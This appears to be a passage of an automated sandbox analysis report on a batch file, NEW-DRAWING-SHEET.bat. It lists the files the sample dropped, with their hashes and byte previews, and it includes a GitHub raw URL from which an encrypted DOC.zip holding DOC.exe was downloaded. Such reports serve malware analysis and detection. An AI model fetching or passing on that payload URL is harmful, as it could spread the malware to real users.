                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aag4vixh.4pq.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acv0bphg.hds.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awlizbmr.3lr.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chxxsqex.zcf.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbvnrp0t.3by.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gvnc4dhe.s4i.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnavyl10.kfq.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_md2sie41.mdb.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2xcelp5.51m.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3buo4od.wsn.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqu313l4.143.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oa3frotp.bl3.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qoojxzdt.s1c.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0p5rce5.3md.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rztpdiqi.pat.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqct24qa.2s5.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbi0wiyf.p1f.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhtazivw.p11.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ur1ikjo2.54j.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfkhzgxf.yqy.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yaw5ttdi.c4b.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\Downloads\DOC.zip.crdownload

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                Category:dropped
                                                                                Size (bytes):1259880
                                                                                Entropy (8bit):7.999849386830486
                                                                                Encrypted:true
                                                                                SSDEEP:24576:u73epKSxTCIfisAvS4umgRFnYreIL5Caq5Ap7GUGOW2GyKoMaHt0ZMg+U:bKeWHvwPneeIL5Caq5AIuph6agZ
                                                                                MD5:9353CD481543E4FCF91E2C770FBCFEFB
                                                                                SHA1:A29A232BC73842CB11D87DC906747A55CC9ED27D
                                                                                SHA-256:9C2AB47B11C7C94A4F2416030F6383B235BAF30770881BA91E7D6534610A5CD5
                                                                                SHA-512:827E1E0C0ED0B664B2232FC28444476A9F28F2DF0EBE4638D93C183684B9FCDAB26C26D5C1374146D8D50D13757408CEABC1CCFFB616913CB8CED08DC0D2D3A2
                                                                                Malicious:false
                                                                                Preview:PK..-.....'4~Y.7..............DOC.exe.....d.......8.............@..G.<.u&..h.V..4..+.q'=D|U[4B$...w<H..'............kDC.6.x.L-..}.\...A.[....V.P.R...i.q...JG.g..J.(].A...P-.....#..PT:%...4....o.U...F.t.d.v..xb..0..iZ4b.z.K.P...U..e..x.......&..:.Q.#.o..e...J.n.H......H.......%...3 .'Fg.......T..u...'5.{.:....@.OdD....q:;_d...2.....v...Z.p...7\....a1.T).........6.......o...[.....].hB9.n....>F.5..r?.3...KX.T.....t..|...u...2..z.....\....{..8`F....P....O;....`.ML.g ..gF.P.r...S............].t..L....E.g5..y|.....F.IZt..MG.5..(.....CLv...e..y8_6...c..z.cm..1...w.k.m...)a..z.X.+.>e$.CM..".......I......R1....*.l.\V_@.n.....ex...0E.D......c.A.,ys.Y....:........s.I.S.Lw/4........k$..L.l.^y....7y..J.....t...**B.;....}ph.y.8^dk^.1...]..@..._!-....5.UK...CM..E~m..v..LFmY.Utn..x.q...s..W....k........t..\...z..@...}..b..r..l.34#y..#...p"...|...=C.N6("p.........T........AY.......>:~...u.~..{......\..dpp...J....m1u......9....3I..SG....6.......]j...^

                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                Chrome Cache Entry: 113

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                Category:downloaded
                                                                                Size (bytes):1259880
                                                                                Entropy (8bit):7.999849386830486
                                                                                Encrypted:true
                                                                                SSDEEP:24576:u73epKSxTCIfisAvS4umgRFnYreIL5Caq5Ap7GUGOW2GyKoMaHt0ZMg+U:bKeWHvwPneeIL5Caq5AIuph6agZ
                                                                                MD5:9353CD481543E4FCF91E2C770FBCFEFB
                                                                                SHA1:A29A232BC73842CB11D87DC906747A55CC9ED27D
                                                                                SHA-256:9C2AB47B11C7C94A4F2416030F6383B235BAF30770881BA91E7D6534610A5CD5
                                                                                SHA-512:827E1E0C0ED0B664B2232FC28444476A9F28F2DF0EBE4638D93C183684B9FCDAB26C26D5C1374146D8D50D13757408CEABC1CCFFB616913CB8CED08DC0D2D3A2
                                                                                Malicious:false
                                                                                URL:https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
                                                                                Preview:PK..-.....'4~Y.7..............DOC.exe.....d.......8.............@..G.<.u&..h.V..4..+.q'=D|U[4B$...w<H..'............kDC.6.x.L-..}.\...A.[....V.P.R...i.q...JG.g..J.(].A...P-.....#..PT:%...4....o.U...F.t.d.v..xb..0..iZ4b.z.K.P...U..e..x.......&..:.Q.#.o..e...J.n.H......H.......%...3 .'Fg.......T..u...'5.{.:....@.OdD....q:;_d...2.....v...Z.p...7\....a1.T).........6.......o...[.....].hB9.n....>F.5..r?.3...KX.T.....t..|...u...2..z.....\....{..8`F....P....O;....`.ML.g ..gF.P.r...S............].t..L....E.g5..y|.....F.IZt..MG.5..(.....CLv...e..y8_6...c..z.cm..1...w.k.m...)a..z.X.+.>e$.CM..".......I......R1....*.l.\V_@.n.....ex...0E.D......c.A.,ys.Y....:........s.I.S.Lw/4........k$..L.l.^y....7y..J.....t...**B.;....}ph.y.8^dk^.1...]..@..._!-....5.UK...CM..E~m..v..LFmY.Utn..x.q...s..W....k........t..\...z..@...}..b..r..l.34#y..#...p"...|...=C.N6("p.........T........AY.......>:~...u.~..{......\..dpp...J....m1u......9....3I..SG....6.......]j...^

                                                                                \Device\ConDrv

                                                                                Download File
                                                                                Process:C:\Program Files\7-Zip\7z.exe
                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                Category:dropped
                                                                                Size (bytes):332
                                                                                Entropy (8bit):4.873129460973007
                                                                                Encrypted:false
                                                                                SSDEEP:6:AMnM3vtFHcAxXF2SaiewdKaLgbWoJPXwdWGvovnbqxRoJPO:poVZRwsUmQ1o4GKqK2
                                                                                MD5:E8D4AD29A7C238F46A289487E5856C30
                                                                                SHA1:A9791EB90B91EB5809FD6B8EA930A12FE57EB991
                                                                                SHA-256:98901DE8E3E15697BF5FC6CBCAA14674B7B987CF619C1ED1E546B675DADB969F
                                                                                SHA-512:C7165ED3AA98E62A6D03F237AF1C90CA15B76A5D98BD35383081156C77B52F4A44F9431BBB9C3DEDFCDD80D55D5D0C837F3A581F91394CBB284008F65F91BCC1
                                                                                Malicious:false
                                                                                Preview:..7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan C:\Users\user\Downloads\. ...ERROR: The system cannot find the file specified...C:\Users\user\Downloads\DOC.zip........System ERROR:..The system cannot find the file specified...

                                                                                \Device\Null

                                                                                Download File
                                                                                Process:C:\Windows\System32\timeout.exe
                                                                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                Category:dropped
                                                                                Size (bytes):72
                                                                                Entropy (8bit):4.595990105158255
                                                                                Encrypted:false
                                                                                SSDEEP:3:hYFYdKAR+mQRKVxLZdte6yn:hYFYGaNZ2zn
                                                                                MD5:DE24BFC8AB7D50F50F54D2F76336D137
                                                                                SHA1:12984BA4960312EEED3EDD6582C4604EC4CBE129
                                                                                SHA-256:CCEBF2DBA9DEB42102B5BE2E09799A160F2AD950713CAC9F02DDFBBE9BEA87FC
                                                                                SHA-512:2451EED90CD3C063497669F4D654285A0AA86F9869BB157A5F91E8877480C3446D32273C53FE0BC32BC662F775A26BD51493D698F19F739D1DB09836E1B551DA
                                                                                Malicious:false
                                                                                Preview:..Waiting for 9 seconds, press a key to continue ....8.7.6.5.4.3.2.1.0..

                                                                                Static File Info

                                                                                General

                                                                                File type:Unicode text, UTF-8 text, with very long lines (813), with CRLF line terminators
                                                                                Entropy (8bit):4.931837795281277
                                                                                TrID:
                                                                                • Affix file (4004/1) 100.00%
                                                                                File name:NEW-DRAWING-SHEET.bat
                                                                                File size:42'315 bytes
                                                                                MD5:6b9cf24f2b691606642bd18bf2227a62
                                                                                SHA1:046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
                                                                                SHA256:f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
                                                                                SHA512:db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e
                                                                                SSDEEP:768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO
                                                                                TLSH:9A13B23CCD822FC6542CCA279F77910F70C7ECED0BDE1E956BAC3A168E8858D54A1816
